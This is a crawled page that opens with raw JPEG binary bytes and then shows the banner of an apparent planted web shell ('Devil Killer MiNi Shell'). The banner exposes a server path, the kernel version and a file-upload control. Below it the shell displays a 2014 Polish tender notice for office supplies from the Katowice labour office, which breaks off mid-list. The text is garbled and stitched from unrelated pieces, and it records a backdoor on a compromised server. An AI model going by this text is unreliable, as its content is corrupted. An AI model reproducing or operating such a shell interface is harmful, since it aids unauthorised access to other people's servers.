JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141002/326660-N-2014.html

<p class="kh_header"><b>Katowice: DOSTAWA MATERIAŁÓW BIUROWYCH NA POTRZEBY WUP W KATOWICACH ORAZ PROJEKTU PRACOWNIKU OŚWIATY - SKORZYSTAJ Z NOWYCH MOŻLIWOŚCI.</b><br>
<b>Numer ogłoszenia: 326660 - 2014; data zamieszczenia: 02.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu województwa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MATERIAŁÓW BIUROWYCH NA POTRZEBY WUP W KATOWICACH ORAZ PROJEKTU PRACOWNIKU OŚWIATY - SKORZYSTAJ Z NOWYCH MOŻLIWOŚCI..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I
Przedmiotem zamówienia w części I jest dostawa materiałów biurowych 

Cienkopis o grubości linii 0,4 mm , czarny, niebieski - 20szt, Długopis automatyczny z wymiennym wkładem wielko pojemnym niebieskim i czarnym, obudowa z tworzywa sztucznego, klips i wykończenie niklowane, szerokość linii pisania 05-07 mm - 15 szt, Wkład do długopisu opisanego w poz. 2 - 25 szt. Długopis żelowy z wymiennym wkładem niebieski, czarny, o grubości linii  0,3 mm - 40szt. Długopis jednorazowy typu BIC kolor : czarny, niebieski, czerwony ( 5 szt.) - 35 szt. Koszulka A4 groszek wykonana folii PP, pakowana po 100 szt. w opakowaniu, o gram. min. 48 mic - 100 op. Obwoluta przestrzenna  A4 , wykonana z folii PCV z euro perforacją do wpinania do segregatora,  pakowana po 10 szt. w opakowaniu - 25 op. Papier kserograficzny A4 80g w technologii ColorLok,  pakowany w paczkach po 500  arkuszy o białości min.  CIE 161 - 300 op. Segregator A4/75 kolor z mechanizmem dźwigniowym - 170 szt. Segregator A4/50 kolor z mechanizmem dźwigniowym - 20 szt. Teczka z gumką  A4 - kolorowa , lakierowana - 100 szt. Zakreślacz ze ściętą końcówką z systemem kapilarnym z płynnym tuszem ( różne kolory- bez różowego ) - 36 szt.
Przedmiot zamówienia należy  dostarczyć na koszt Wykonawcy do siedziby Wojewódzkiego Urzędu Pracy w Katowicach, ul. Kościuszki 30, do pokoju 604-605 - VI piętro, od poniedziałku do piątku 
w godz. 8.00 -14.00, w terminie 7 dni od dnia otrzymanego zlecenia. Wykonawca zobowiązany jest 
do sporządzenia protokołu zdawczo - odbiorczego w 2 egzemplarzach.

UWAGA
Wszystkie ilości zamawianych materiałów biurowych w części I i II są ilościami orientacyjnymi, określonymi w celu oszacowania wartości zamówienia oraz dokonania porównania ofert. Ilości te mogą ulec zmianie (zmniejszeniu), przy czym Wykonawca z tego tytułu nie będzie wnosił roszczeń. 


Część II
Przedmiotem zamówienia w części II jest dostawa materiałów biurowych 

Kalkulator z dużym12-poz. wyświetlaczem, z podwójnym zasilaniem, z pamięcią, z klawiszem cofania, nie mniejszym niż 165x115x22 mm - 10 szt. Kalendarz na 2015 r.  biurkowy pionowy stojący - 120 szt. Kalendarz na 2015 r. biurkowy poziomy, leżący - 110 szt. Kalendarz na 2015 r. leżący na podstawce kartonowej - 12 szt. Koperta C6  biała samoprzylepna pakowana po 1000 szt.- 7 op. Koperta C4 biała samoprzylepna pakowana po 250 szt. w opakowaniu - 4 op. Papier pakowy szary w arkuszach o wym. 120x80 cm - 20 szt. Skoroszyt  wielooczkowy z folii PCV  do zawieszania w segregatorze - różne kolory, pakowane po 20 szt. w opakowaniu - 30 op. Taśma do drukarek etykiet  DYMO 12 mm  x 7 m,  45013 - 5 szt. Taśma pakowa przeźroczysta  48  x 50 mm - 5 szt.

Przedmiot zamówienia należy  dostarczyć na koszt Wykonawcy do siedziby Wojewódzkiego Urzędu Pracy w Katowicach, ul. Kościuszki 30, do pokoju 604-605 - VI piętro, od poniedziałku do piątku w godz. 8.00 -14.00, w terminie 7 dni od dnia otrzymanego zlecenia. Wykonawca zobowiązany jest do sporządzenia protokołu zdawczo - odbiorczego w 2 egzemplarzach.


UWAGA
Wszystkie ilości zamawianych materiałów biurowych w części I i II są ilościami orientacyjnymi, określonymi w celu oszacowania wartości zamówienia oraz dokonania porównania ofert. Ilości te mogą ulec zmianie (zmniejszeniu), przy czym Wykonawca z tego tytułu nie będzie wnosił roszczeń. 


Część III
Przedmiotem zamówienia są materiały biurowe dla pracowników projektu pt. Pracowniku oświaty - skorzystaj z nowych możliwości współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

Długopis automatyczny z systemem przyciskowym, gumowy uchwyt, przeźroczysta obudowa - 15 szt. Pisak do płyt CD 4 szt. w opakowaniu, długość pisania jednego pisaka: 500 metrów. kolor czarny - 1 op. Ołówek HB z gumką - 15 szt. Gumka do ścierania grafitu z papieru - 6 szt. Temperówka metalowa w kształcie klina, profilowane rowki ułatwiające trzymanie - 6 szt. Papier ksero A4, 80g, biały, ryza 500 arkuszy - 10 ryz. Papier ksero A4, 80 g, pomarańczowy, ryza 500 arkuszy - 1 ryza. Papier samoprzylepny -Etykiety samoprzylepne A4, białe, do druku laserowego, atramentowego i ksero, 100 arkuszy w opakowaniu - 1 op. Blok szkolny A4w kratkę, 100 kartek, klejony górny grzbiet (z możliwością wyrywania kartek) - 6 szt. Bloczek samoprzylepny76x76 kolorowe, 400 kartek - 5 szt. Bloczek kostka Biały 85x85x35 mm klejony - 10 szt. Koszulki do segregatora A4 przeźroczyste 20 szt. w 1 op. - 10 op. Segregator oklejony na zewnątrz pollolefiną, wewnątrz pokryty szarym papierem, dwustronna, wymienna etykieta na grzbiecie, otwór na palec na grzbiecie, na dolnych krawędziach metalowe okucia dwa otwory na przedniej okładce szerokość grzbietu 70 mm, format A4 - 10 szt. Zakreślacze fluorescencyjne, z tuszem na bazie wody do pisania na wszystkich rodzajach papieru, duża odporność na wysychanie - 6 szt. Koperta C6 samoklejąca biała 114x162mm bez okienka. 1000szt./op. - 1 op. Koperta C4 samoklejąca 229x324 biała bez okienka, 250szt./op. - 1 op. Taśma klejąca Biurowa przezroczysta 24mm rolka 20m - 6 szt. Taśma dwustronna50mm rolka 25m - warstwa przyklejana przezroczysta- 6 szt. Dziurkacz biurowyplastikowe ramię, metalowa podstawa, wykończenia z tworzyw sztucznych, zdolność dziurkowania do 20 kartek, posiada ogranicznik formatu- 2 szt. Zszywacz biurowyMetalowy, możliwość zszycia min. 25 kartek jednocześnie, na zszywki 24/6, 26/6, głębokość wsuwania 48 mm - 6 szt. Rozszywacz Z blokadą, do zszywek we wszystkich rozmiarach - 6 szt. Zszywki 24/6 Wykonane z stali; opakowanie ok. 1000szt; rozmiar 24/6. - 20 op. Spinacze małe Metalowe 28mm po 100szt w 1 op.- 15 op. Spinacze duże Metalowe 50mm po 100szt w 1 op. - 5 op. Klipy do papieru 51mm, czarne, 12szt/op - 5 op. Teczka z gumką  Wykonana z białej tektury, wyposażona w gumkę wzdłuż dłuższego boku, format A4, 300g, wymiary 230x320 mm -20 szt. Przybornik na biurko Wykonany z wysokiej jakości tworzywa, 5 przegródek o różnej wielkości, gumowe ograniczniki na spodzie -3szt. Szuflady na biurko wykonane z polistyrenu, miejsce na etykietkę, wymiary wewnętrzne: 243x57x335 mm, wymiary zewnętrzne: 255x65x348 mm - 6 szt. Kalendarz książkowy 2014 Tygodniowy A4, w twardej oprawie,- 2 szt. Pinezki Do tablicy korkowej, plastikowe łebki, kolorowe, 100 szt. w opakowaniu.- 2 op. Nożyczki do wszechstronnego zastosowania 21 cm; podgumowane uchwyty na palce. - 1 szt. Płyty DVD 4,7 GB do nagrywania, 50szt w opakowaniu. - 1 op. Skoroszyty zawieszkowe Opakowanie 10 szt., wykonany z PCV, twardy, wymiary: 232x314 - 5 op. Kalkulator 12 pozycyjny wyświetlacz, plastikowe klawisze, ilość pól wyświetlacza: 12, podwójne zasilanie, klawisz podwójnego zera, wymiary: 128,5x130x34 mm - 2 szt. Teczka do podpisów format A4, 16 przekładek, wykonana z kartonu pokrytego skóropodobnym tworzywem, grzbiet wykonany harmonijkowo, przekładki kartonowe białe z dziurkami, - 1 szt.

Przedmiot zamówienia należy  dostarczyć na koszt Wykonawcy do siedziby Wojewódzkiego Urzędu Pracy - filia w Częstochowie Aleja Niepodległości 20/22, do pokoju 246 - II piętro, od poniedziałku do piątku w godz. 8.00 -14.00, w terminie 7 dno od dnia zawarcia umowy. Wykonawca zobowiązany jest do sporządzenia protokołu zdawczo - odbiorczego w 2 egzemplarzach..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2) pkt 2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup-katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 
pok. 608 - VI piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.10.2014 godzina 11:00, miejsce: Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 
pok. 210 - II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Część I: Dostawa współfinansowana przez Unię Europejską  ze środków Europejskiego Funduszu Społecznego
w ramach Pomocy Technicznej Programu Operacyjnego Kapitał Ludzki
Część II: Projekt Pracowniku oświaty - skorzystaj z nowych możliwości współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia w części I jest dostawa materiałów biurowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cienkopis o grubości linii 0,4 mm , czarny, niebieski - 20szt, Długopis automatyczny z wymiennym wkładem wielko pojemnym niebieskim i czarnym, obudowa z tworzywa sztucznego, klips i wykończenie niklowane, szerokość linii pisania 05-07 mm - 15 szt, Wkład do długopisu opisanego w poz. 2 - 25 szt. Długopis żelowy z wymiennym wkładem niebieski, czarny, o grubości linii  0,3 mm - 40szt. Długopis jednorazowy typu BIC kolor : czarny, niebieski, czerwony ( 5 szt.) - 35 szt. Koszulka A4 groszek wykonana folii PP, pakowana po 100 szt. w opakowaniu, o gram. min. 48 mic - 100 op. Obwoluta przestrzenna  A4 , wykonana z folii PCV z euro perforacją do wpinania do segregatora,  pakowana po 10 szt. w opakowaniu - 25 op. Papier kserograficzny A4 80g w technologii ColorLok,  pakowany w paczkach po 500  arkuszy o białości min.  CIE 161 - 300 op. Segregator A4/75 kolor z mechanizmem dźwigniowym - 170 szt. Segregator A4/50 kolor z mechanizmem dźwigniowym - 20 szt. Teczka z gumką  A4 - kolorowa , lakierowana - 100 szt. Zakreślacz ze ściętą końcówką z systemem kapilarnym z płynnym tuszem ( różne kolory- bez różowego ) - 36 szt.
Przedmiot zamówienia należy  dostarczyć na koszt Wykonawcy do siedziby Wojewódzkiego Urzędu Pracy w Katowicach, ul. Kościuszki 30, do pokoju 604-605 - VI piętro, od poniedziałku do piątku 
w godz. 8.00 -14.00, w terminie 7 dni od dnia otrzymanego zlecenia. Wykonawca zobowiązany jest 
do sporządzenia protokołu zdawczo - odbiorczego w 2 egzemplarzach.

UWAGA
Wszystkie ilości zamawianych materiałów biurowych w części I i II są ilościami orientacyjnymi, określonymi w celu oszacowania wartości zamówienia oraz dokonania porównania ofert. Ilości te mogą ulec zmianie (zmniejszeniu), przy czym Wykonawca z tego tytułu nie będzie wnosił roszczeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia w części II jest dostawa materiałów biurowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II
Przedmiotem zamówienia w części II jest dostawa materiałów biurowych 

Kalkulator z dużym12-poz. wyświetlaczem, z podwójnym zasilaniem, z pamięcią, z klawiszem cofania, nie mniejszym niż 165x115x22 mm - 10 szt. Kalendarz na 2015 r.  biurkowy pionowy stojący - 120 szt. Kalendarz na 2015 r. biurkowy poziomy, leżący - 110 szt. Kalendarz na 2015 r. leżący na podstawce kartonowej - 12 szt. Koperta C6  biała samoprzylepna pakowana po 1000 szt.- 7 op. Koperta C4 biała samoprzylepna pakowana po 250 szt. w opakowaniu - 4 op. Papier pakowy szary w arkuszach o wym. 120x80 cm - 20 szt. Skoroszyt  wielooczkowy z folii PCV  do zawieszania w segregatorze - różne kolory, pakowane po 20 szt. w opakowaniu - 30 op. Taśma do drukarek etykiet  DYMO 12 mm  x 7 m,  45013 - 5 szt. Taśma pakowa przeźroczysta  48  x 50 mm - 5 szt.

Przedmiot zamówienia należy  dostarczyć na koszt Wykonawcy do siedziby Wojewódzkiego Urzędu Pracy w Katowicach, ul. Kościuszki 30, do pokoju 604-605 - VI piętro, od poniedziałku do piątku 
w godz. 8.00 -14.00, w terminie 7 dni od dnia otrzymanego zlecenia. Wykonawca zobowiązany jest 
do sporządzenia protokołu zdawczo - odbiorczego w 2 egzemplarzach.


UWAGA
Wszystkie ilości zamawianych materiałów biurowych w części I i II są ilościami orientacyjnymi, określonymi w celu oszacowania wartości zamówienia oraz dokonania porównania ofert. Ilości te mogą ulec zmianie (zmniejszeniu), przy czym Wykonawca z tego tytułu nie będzie wnosił roszczeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem zamówienia są materiały biurowe dla pracowników projektu pt. Pracowniku oświaty - skorzystaj z nowych możliwości współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III
Przedmiotem zamówienia są materiały biurowe dla pracowników projektu pt. Pracowniku oświaty - skorzystaj z nowych możliwości współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

Długopis automatyczny z systemem przyciskowym, gumowy uchwyt, przeźroczysta obudowa - 15 szt. Pisak do płyt CD 4 szt. w opakowaniu, długość pisania jednego pisaka: 500 metrów. kolor czarny - 1 op. Ołówek HB z gumką - 15 szt. Gumka do ścierania grafitu z papieru - 6 szt. Temperówka metalowa w kształcie klina, profilowane rowki ułatwiające trzymanie - 6 szt. Papier ksero A4, 80g, biały, ryza 500 arkuszy - 10 ryz. Papier ksero A4, 80 g, pomarańczowy, ryza 500 arkuszy - 1 ryza. Papier samoprzylepny -Etykiety samoprzylepne A4, białe, do druku laserowego, atramentowego i ksero, 100 arkuszy w opakowaniu - 1 op. Blok szkolny A4w kratkę, 100 kartek, klejony górny grzbiet (z możliwością wyrywania kartek) - 6 szt. Bloczek samoprzylepny76x76 kolorowe, 400 kartek - 5 szt. Bloczek kostka Biały 85x85x35 mm klejony - 10 szt. Koszulki do segregatora A4 przeźroczyste 20 szt. w 1 op. - 10 op. Segregator oklejony na zewnątrz pollolefiną, wewnątrz pokryty szarym papierem, dwustronna, wymienna etykieta na grzbiecie, otwór na palec na grzbiecie, na dolnych krawędziach metalowe okucia dwa otwory na przedniej okładce szerokość grzbietu 70 mm, format A4 - 10 szt. Zakreślacze fluorescencyjne, z tuszem na bazie wody do pisania na wszystkich rodzajach papieru, duża odporność na wysychanie - 6 szt. Koperta C6 samoklejąca biała 114x162mm bez okienka. 1000szt./op. - 1 op. Koperta C4 samoklejąca 229x324 biała bez okienka, 250szt./op. - 1 op. Taśma klejąca Biurowa przezroczysta 24mm rolka 20m - 6 szt. Taśma dwustronna50mm rolka 25m - warstwa przyklejana przezroczysta- 6 szt. Dziurkacz biurowyplastikowe ramię, metalowa podstawa, wykończenia z tworzyw sztucznych, zdolność dziurkowania do 20 kartek, posiada ogranicznik formatu- 2 szt. Zszywacz biurowyMetalowy, możliwość zszycia min. 25 kartek jednocześnie, na zszywki 24/6, 26/6, głębokość wsuwania 48 mm - 6 szt. Rozszywacz Z blokadą, do zszywek we wszystkich rozmiarach - 6 szt. Zszywki 24/6 Wykonane z stali; opakowanie ok. 1000szt; rozmiar 24/6. - 20 op. Spinacze małe Metalowe 28mm po 100szt w 1 op.- 15 op. Spinacze duże Metalowe 50mm po 100szt w 1 op. - 5 op. Klipy do papieru 51mm, czarne, 12szt/op - 5 op. Teczka z gumką  Wykonana z białej tektury, wyposażona w gumkę wzdłuż dłuższego boku, format A4, 300g, wymiary 230x320 mm -20 szt. Przybornik na biurko Wykonany z wysokiej jakości tworzywa, 5 przegródek o różnej wielkości, gumowe ograniczniki na spodzie -3szt. Szuflady na biurko wykonane z polistyrenu, miejsce na etykietkę, wymiary wewnętrzne: 243x57x335 mm, wymiary zewnętrzne: 255x65x348 mm - 6 szt. Kalendarz książkowy 2014 Tygodniowy A4, w twardej oprawie,- 2 szt. Pinezki Do tablicy korkowej, plastikowe 